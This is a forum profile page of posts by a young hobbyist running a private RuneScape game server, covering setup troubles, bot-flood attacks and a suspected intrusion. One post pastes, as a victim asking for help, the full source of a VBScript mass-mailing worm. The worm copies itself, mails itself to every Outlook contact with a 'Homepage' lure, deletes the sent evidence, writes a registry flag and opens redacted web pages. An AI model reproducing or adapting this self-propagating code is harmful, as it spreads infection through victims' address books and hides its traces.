Jump to content

Warren-Plus

Members
  • Posts

    51
  • Joined

  • Last visited

Reputation

0 Neutral

About Warren-Plus

  1. Its just run from my home machine. Players access the game using our downloadable client or a webclient like the one on moparscape.org Brendan
  2. Umm thats all confusing to me. It is someone elses code but i have added things to it and edited others etc. Its basically just lots of .class files with a few other folders to store information on all characters. Its run using command prompt. A sample of the code can be downloaded here: http://www.brenzscape.co.uk/Server/client.java This is the main .class file in its Java form. Plz Help Thnx Brendan
  3. Yea nVida sponsored it so us PC gamers got it free I love Creek its amazing for S&D and so is Chinatown. Just get the M14 with silencer and a P90 with Claymores, Slieght Of Hand & Dead silence = Ownage Cant wait for COD5: World At War Brendan
  4. Hi. I have a game server which is written in Java. One problem, someone released a program which can be used on games like mine to crash them. Basically it logs in hundreds of accounts using the name SYIPkpker(random letter) This is getting really annoying as ive been attacked twice in the last 2 days so i was wondering is there a way i could make a If statement so if the name began with SYI it would block the connection and send it back ? P.S. Im quite new to java Thanks for your help Brendan
  5. Yea it is my runescape server. And i havent opened any attachments. Brendan
  6. Yea im running it from home as i cant afford hosting yet. Ive got Widows Firewall and ive only got the ports i need open on the router. Ive got AVG aswell. Ill contact all my members now. Brendan
  7. Well he has gathered personal information about players on my game that are stored on my PC. Since posting this he came on last nite and was doing something last night. I still have no idea about how he got into the files or if he has done anything else to my java files. ill find out later on today when get home from school and recompile my server. Also does anyone here kno any cheap game hosting services. The cheapest ive found is £15 a month Brendan
  8. Rite this just got serious. He has now gained access to my PC (dont know how) and attacked my server and also my staff. I have him IP logged on my forums and i have another IP he uses for his server. What can i do ? Brendan
  9. Happy Birthday Brendan
  10. Thnx guys. Should i do anything about this ? Brendan
  11. Hi all. Recently i have been making an online game and on Sunday i banned a player on there but when he found out who had reported him to me he sent them a script or something. I worked out part of it changed their homepage to a porn site but i dunno if there is anything else in there. I have split it up incase there is something. On Error Resume Next Set WS = CreateObject("WScript.Shell") Set FSO= Createobject("scripting.filesystemobject") Folder=FSO.GetSpecialFolder(2) Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1) Do While InF.AtEndOfStream<>True ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf Loop Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) OutF.write ScriptBuffer OutF.close Set FSO=Nothing If WS.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If Set s=CreateObject("Outlook.Application") Set t=s.GetNameSpace("MAPI") Set u=t.GetDefaultFolder(6) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).close u.Items.Item(i).delete End If Next Set u=t.GetDefaultFolder(3) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).delete End If Next Randomize r=Int((4*Rnd)+1) If r=1 then WS.Run("http://********.*************.net/*******/1.htm") elseif r=2 Then WS.Run("http://*******.****.com/_XMCM/*******/1.htm") elseif r=3 Then WS.Run("http://www2.*********.com/*******/******/1.htm") ElseIf r=4 Then WS.Run("http://******.******.tv/1.htm") End If Function Mailit() On Error Resume Next Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Mapi=Outlook.GetNameSpace("MAPI") Set Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount Set Mail = Outlook.CreateItem(0) Set Contact = ListIndex.AddressEntries(Count) Mail.To = Contact.Address Mail.Subject = "Homepage" Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf Set Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.HTML.vbs" Mail.DeleteAfterSubmit = True If Mail.To <> "" Then Mail.Send WS.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function Can anyone tell me if this does anything else or if i should do something about it ? Brendan PS. I didnt know if this was the right section. been a while since I been on here.
  12. Yea ive tried with my proper IP address and i get the same thing. Yea im gonna run it from my computer and like most of the others do just run it whenever i can. Hardly any of the servers are up constantly some only 1 hour a day. Ill try it again and see what files im missing. Thnx Brendan EDIT: Ive now found a different server to use which does work (Most of the time) Thanks for all the help. If anyone plays on private rs servers come join me on 80.42.206.215 I have got another problem now. When i was messin about with the old one i somehow ruined my java in my browser and it wont work. Any1 know how i can fix it. Thnx Brendan
  13. Thnx for the help. That last problem is sorted now and it says the server is online but when i try and connect using localhost an error comes up again and it closes. http://i141.photobucket.com/albums/r57/Warren-Plus/server2.jpg http://i141.photobucket.com/albums/r57/Warren-Plus/server3.jpg And yea it is runescape. If anyone knows anything about it im using Project Czar. I did have a simple one set up a few days ago working but it was riddeled with faults and glitches aswell as there were no NPC's and evryone became admin. lol Thnx Brendan
  14. Hi, Im trying to set up my own custom rs server but whenever i try and start the server i get an error message. Can any1 give me any tips to try and fix the problems. http://i141.photobucket.com/albums/r57/Warren-Plus/runserver.jpg Ty Brendan
  15. We had Ofsted in today but they were only in English and the first thing we were told when we got into class was be good because ofsted are in and anyone that played up was send to their named contacts or somewhere else in the school. lol Brendan
×
×
  • Create New...